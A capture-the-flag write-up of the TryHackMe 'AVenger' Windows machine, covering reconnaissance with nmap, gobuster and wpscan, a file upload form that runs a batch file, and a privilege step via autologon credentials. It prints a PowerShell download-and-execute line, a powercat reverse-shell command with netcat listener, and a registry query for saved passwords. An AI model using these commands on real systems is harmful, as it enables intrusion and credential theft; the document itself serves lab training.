AVenger
Recon
We first start with a simple Nmap scan and discover several open ports and services running on them. Some notable services are HTTP on port 80, HTTPS on port 443, SMB on port 445, RDP on port 3389, WinRM on port 5985
┌──(kali㉿kali)-[~/THM/AVenger]
└─$ nmap -p- 10.10.10.22 -v -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-01 01:27 EST
Initiating Ping Scan at 01:27
Completed Connect Scan at 01:34, 437.04s elapsed (65535 total ports)
Nmap scan report for 10.10.10.22
Host is up (0.15s latency).
Not shown: 65476 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
921/tcp filtered unknown
3306/tcp open mysql
3389/tcp open ms-wbt-server
5985/tcp open wsman
6053/tcp filtered x11
7680/tcp open pando-pub
38865/tcp filtered secrmmsafecopya
47001/tcp open winrmFor more results we can run a more detailed scan with specified services and default script scan on the initially found ports
┌──(kali㉿kali)-[~/THM/AVenger]
└─$ nmap -p 80,135,139,443,445,921,3306,3389,5985,6053,7680,38865,47001 -A avenger.thm -v
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-01 01:39 EST
Nmap scan report for avenger.thm (10.10.10.22)
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp/
|_
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.5K 2022-06-15 16:07 applications.html
| 177 2022-06-15 16:07 bitnami.css
| - 2023-04-06 09:24 dashboard/
| 30K 2015-07-16 15:32 favicon.ico
| - 2023-06-27 09:26 gift/
| - 2023-06-27 09:04 img/
| 751 2022-06-15 16:07 img/module_table_bottom.png
| 337 2022-06-15 16:07 img/module_table_top.png
| - 2023-06-28 14:39 xampp/
|_
|_ssl-date: TLS randomness does not represent time
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-title: Index of /
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
3306/tcp open mysql MySQL 5.5.5-10.4.28-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.28-MariaDB
| Thread ID: 14
| Capabilities flags: 63486
| Some Capabilities: SupportsCompression, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, InteractiveClient, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, ODBCClient, Support41Auth, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: 4XB}q>#2qe%%+HgQ=|{r
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: GIFT
| NetBIOS_Domain_Name: GIFT
| NetBIOS_Computer_Name: GIFT
| DNS_Domain_Name: gift
| DNS_Computer_Name: gift
| Product_Version: 10.0.17763
|_ System_Time: 2023-12-01T06:39:46+00:00
| ssl-cert: Subject: commonName=gift
| Issuer: commonName=gift
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-11-30T06:23:38
| Not valid after: 2024-05-31T06:23:38
| MD5: abda:da8b:9674:a0b8:0fca:21c1:5205:4867
|_SHA-1: 17d7:06a7:8f1f:fc21:416d:e372:db8b:6822:8854:7aa9
|_ssl-date: 2023-12-01T06:39:57+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6053/tcp closed x11
7680/tcp closed pando-pub
38865/tcp closed secrmmsafecopya
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time:
| date: 2023-12-01T06:39:49
|_ start_date: N/A
921/tcp closed unknown
NSE: Script Post-scanning.
Initiating NSE at 01:40
Completed NSE at 01:40, 0.00s elapsed
Initiating NSE at 01:40
Completed NSE at 01:40, 0.00s elapsed
Initiating NSE at 01:40
Completed NSE at 01:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.49 seconds
After the Nmap scan is completed, We run a Gobuster scan to enumerate all possiblle directories running on the web server.
┌──(kali㉿kali)-[~/THM/AVenger]
└─$ gobuster dir -u http://avenger.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://avenger.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 333] [--> http://avenger.thm/img/]
/wordpress (Status: 301) [Size: 339] [--> http://avenger.thm/wordpress/]
/examples (Status: 503) [Size: 401]
/licenses (Status: 403) [Size: 420]
/gift (Status: 301) [Size: 334] [--> http://avenger.thm/gift/]
/dashboard (Status: 301) [Size: 339] [--> http://avenger.thm/dashboard/]
/%20 (Status: 403) [Size: 301]
/IMG (Status: 301) [Size: 333] [--> http://avenger.thm/IMG/]
/*checkout* (Status: 403) [Size: 301]
/Img (Status: 301) [Size: 333] [--> http://avenger.thm/Img/]
/phpmyadmin (Status: 403) [Size: 301]
/webalizer (Status: 403) [Size: 420]
/*docroot* (Status: 403) [Size: 301]
/* (Status: 403) [Size: 301]
/con (Status: 403) [Size: 301]
/Dashboard (Status: 301) [Size: 339] [--> http://avenger.thm/Dashboard/]
/http%3A (Status: 403) [Size: 301]
/**http%3a (Status: 403) [Size: 301]
/*http%3A (Status: 403) [Size: 301]
/xampp (Status: 301) [Size: 335] [--> http://avenger.thm/xampp/]
/aux (Status: 403) [Size: 301]
/**http%3A (Status: 403) [Size: 301]
/Gift (Status: 301) [Size: 334] [--> http://avenger.thm/Gift/]
/%C0 (Status: 403) [Size: 301]
/server-status (Status: 403) [Size: 420]
/%3FRID%3D2671 (Status: 403) [Size: 301]
/devinmoore* (Status: 403) [Size: 301]
/200109* (Status: 403) [Size: 301]
.
.
.
/login%3f (Status: 403) [Size: 301]
/%22julie%20roehm%22 (Status: 403) [Size: 301]
/%22james%20kim%22 (Status: 403) [Size: 301]
/%22britney%20spears%22 (Status: 403) [Size: 301]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
We can see few services are running such as Wordpress. Upon manual enumeration /wordpress led to the below page.
Any links on the /wordpress would redirect to avenger.tryhackme/gift.
Manually opening http://avenger.thm/gift would do the same.
After adding the same to /etc/hosts.
A wpscan of http://avenger.thm/wordpress/ did not reveal much information, however a scan of http://avenger.tryhackme/gift/ revelead the following.
┌──(kali㉿kali)-[~]
└─$ wpscan --api-token [REDACTED] --url http://avenger.tryhackme/gift/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://avenger.tryhackme/gift/ [10.10.10.22]
[+] Started: Fri Dec 1 04:23:06 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| - X-Powered-By: PHP/8.0.28
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://avenger.tryhackme/gift/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://avenger.tryhackme/gift/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://avenger.tryhackme/gift/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://avenger.tryhackme/gift/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.2.2 identified (Insecure, released on 2023-05-20).
| Found By: Rss Generator (Passive Detection)
| - http://avenger.tryhackme/gift/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
| - http://avenger.tryhackme/gift/comments/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
|
| [!] 6 vulnerabilities identified:
|
| [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block
| Fixed in: 6.2.3
| References:
| - https://wpscan.com/vulnerability/cd130bb3-8d04-4375-a89a-883af131ed3a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38000
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
| Fixed in: 6.2.3
| References:
| - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
| Fixed in: 6.2.3
| References:
| - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
| Fixed in: 6.2.3
| References:
| - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
| Fixed in: 6.2.3
| References:
| - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
| Fixed in: 6.2.3
| References:
| - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
| - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
[+] WordPress theme in use: astra
| Location: http://avenger.tryhackme/gift/wp-content/themes/astra/
| Last Updated: 2023-11-21T00:00:00.000Z
| Readme: http://avenger.tryhackme/gift/wp-content/themes/astra/readme.txt
| [!] The version is out of date, the latest version is 4.5.1
| Style URL: http://avenger.tryhackme/gift/wp-content/themes/astra/style.css
| Style Name: Astra
| Style URI: https://wpastra.com/
| Description: Astra is fast, fully customizable & beautiful WordPress theme suitable for blog, personal portfolio,...
| Author: Brainstorm Force
| Author URI: https://wpastra.com/about/?utm_source=theme_preview&utm_medium=author_link&utm_campaign=astra_theme
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 4.1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://avenger.tryhackme/gift/wp-content/themes/astra/style.css, Match: 'Version: 4.1.5'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] forminator
| Location: http://avenger.tryhackme/gift/wp-content/plugins/forminator/
| Last Updated: 2023-11-13T09:11:00.000Z
| [!] The version is out of date, the latest version is 1.28.0
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: Forminator < 1.24.4 - Reflected XSS
| Fixed in: 1.24.4
| References:
| - https://wpscan.com/vulnerability/6d50d3cc-7563-42c4-977b-f834fee711da
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3134
| - https://www.onvio.nl/nieuws/research-day-discovering-vulnerabilities-in-wordpress-plugins
|
| [!] Title: Forminator < 1.25.0 - Unauthenticated Arbitrary File Upload
| Fixed in: 1.25.0
| References:
| - https://wpscan.com/vulnerability/fb8db268-77d9-47b5-ad41-e9c05f0e7523
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4596
| - https://www.exploit-db.com/exploits/51664/
|
| [!] Title: Forminator and Forminator Pro < 1.27.0 - Admin+ Stored Cross-Site Scripting
| Fixed in: 1.27.0
| References:
| - https://wpscan.com/vulnerability/229207bb-8f8d-4579-a8e2-54516474ccb4
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5119
|
| [!] Title: Forminator < 1.28.0 - Admin+ Arbitrary File Upload
| Fixed in: 1.28.0
| References:
| - https://wpscan.com/vulnerability/7d1ead56-7db2-46c4-97ed-af008e9b5515
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6133
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/13cfa202-ab90-46c0-ab53-00995bfdcaa3
|
| Version: 1.24.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
[+] ultimate-addons-for-gutenberg
| Location: http://avenger.tryhackme/gift/wp-content/plugins/ultimate-addons-for-gutenberg/
| Last Updated: 2023-11-30T14:51:00.000Z
| [!] The version is out of date, the latest version is 2.10.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 2.6.9 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://avenger.tryhackme/gift/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://avenger.tryhackme/gift/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:01:09 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:01:09
[i] No Config Backups Found.
[+] Finished: Fri Dec 1 04:24:49 2023
[+] Requests Done: 179
[+] Cached Requests: 6
[+] Data Sent: 49.125 KB
[+] Data Received: 975.477 KB
[+] Memory used: 256.109 MB
[+] Elapsed time: 00:01:42
We see Forminator version 1.24.1 is in use. Which is affected by the vulnerability of unauthenticated remote command execution in version 1.24.6 (CVE-2023-4596). This vulnerability would allow us to upload a reverse shell, execute it and gain access.
Upon further manual enumeration of http://avenger.tryhackme/gift/ at the bottom we find a form with an upload file. This is where we can exploit this vulnerability.
Initial Access
First I tried uploading a reverse shell and accessing it but it was not available. I could not find the uploaded file. When we upload a file and submit, we get a message that states "Thank you for your submission . Our team is delighted to review every message carefully. You will hear from us shortly!."
We can create a html file containing an img tag, we then point the source of that image to our IP address. If we get any requests then the file is definitely being opened.
To test this
echo '<img src="http://IP_ADDRESS/">' > cat.htmlWe upload the file 'cat.html' and setup a http server with python, and after some time we get a request.
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [01/Dec/2023 04:50:23] "GET / HTTP/1.1" 200 -This is confirmation that the file is being opened. Now we just need to upload a malicious file that can give us a reverse shell.
I was lucky enough to get it on first try with a batch file, batch files are essentially text files that contain a set of commands that can be executed when run.
We create a simple one with the same concept of the HTML file to check if we get a request back.
echo 'curl http://IP_ADDRESS/cats' > test.batI initially messed up this command with the wrong IP and it did not work, after quite some time, I realised I had entered the wrong IP and then it worked.
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [01/Dec/2023 04:56:19] code 404, message File not found
10.10.10.22 - - [01/Dec/2023 04:56:19] "GET /cats HTTP/1.1" 404 -This confirms that we have command execution. Now we need to generate and upload a powershell reverse shell.
This can be done with the help of powercat.
└─$ powercat -c IP_ADDRESS -p 443 -e cmd -g > cat.ps1We need to modify our batch file to give us a reverse shell.
echo "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://[REDACTED]/cat.ps1')" > cats.batWe then upload this and set up a listner for our reverse shell.
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [01/Dec/2023 04:58:19] "GET /cat.ps1 HTTP/1.1" 200 -
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.10.22] 50600
Microsoft Windows [Version 10.0.17763.4499]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
gift\hugo
we see that our powershell reverse shell works, and after that we immediately got a shell as the user hugo.
After that we can look at the desktop of hugo for our first flag
C:\Users>cd hugo
cd hugo
C:\Users\hugo>cd desktop
cd desktop
C:\Users\hugo\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\hugo\Desktop
07/10/2023 09:40 PM <DIR> .
07/10/2023 09:40 PM <DIR> ..
06/21/2016 03:36 PM 527 EC2 Feedback.website
06/21/2016 03:36 PM 554 EC2 Microsoft Windows Guide.website
07/25/2023 02:14 PM 48 user.txt
3 File(s) 1,129 bytes
2 Dir(s) 10,822,037,504 bytes free
C:\Users\hugo\Desktop>type user.txt
type user.txt
[FIRST_FLAG]
C:\Users\hugo\Desktop>
Privilege Escalation
We first check in what groups our user Hugo is in.
C:\Users\hugo\Desktop>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192We can see we are part of Administrators, so let's try changing into Administrators directory.
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users
06/30/2023 07:52 AM <DIR> .
06/30/2023 07:52 AM <DIR> ..
08/18/2023 12:53 PM <DIR> Administrator
11/25/2023 12:15 AM <DIR> hugo
12/12/2018 07:45 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 10,822,209,536 bytes free
C:\Users>cd Administrator
cd Administrator
Access is denied.
We however get Access is denied. It is possible that UAC or (User Account Control) is preventing us from performing any administrative tasks, we can check if UAC is enabled with this command :
C:\Users>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA REG_DWORD 0x1We got 0x1, this means UAC is enabled, and also we see that we're in the Mandatory Label\Medium Mandatory Level group, this means that we are in a medium integrity level shell, and UAC is preventing us from doing administrative tasks.
If we know the password of the user Hugo we can connect via RDP and just get access.
One common place where we can search for credentials is autologon, which is a feature that allows a user to configure the system to automatically log in to a specific user account without requiring manual input of the username and password.
We can find the saved credentials in the HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon registry.
C:\Users\hugo\Desktop>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
.
.
.
AutoAdminLogon REG_SZ 1
DefaultUserName REG_SZ hugo
DefaultPassword REG_SZ [REDACTED]
AutoLogonSID REG_SZ S-1-5-21-1966530601-3185510712-10604624-1008
LastUsedUsername REG_SZ hugo
ShellAppRuntime REG_SZ ShellAppRuntime.exe
Here we have the password of Hugo
Now we simply connect with RDP.
sudo xfreerdp /u:hugo /p:[REDACTED] /cert:ignore /v:10.10.10.22 /dynamic-resolutionNow we have successfully connected via RDP.
When trying to ccessing the Administrator folder we get a UAC prompt, simply click continue and can get our root flag.
Last updated
Was this helpful?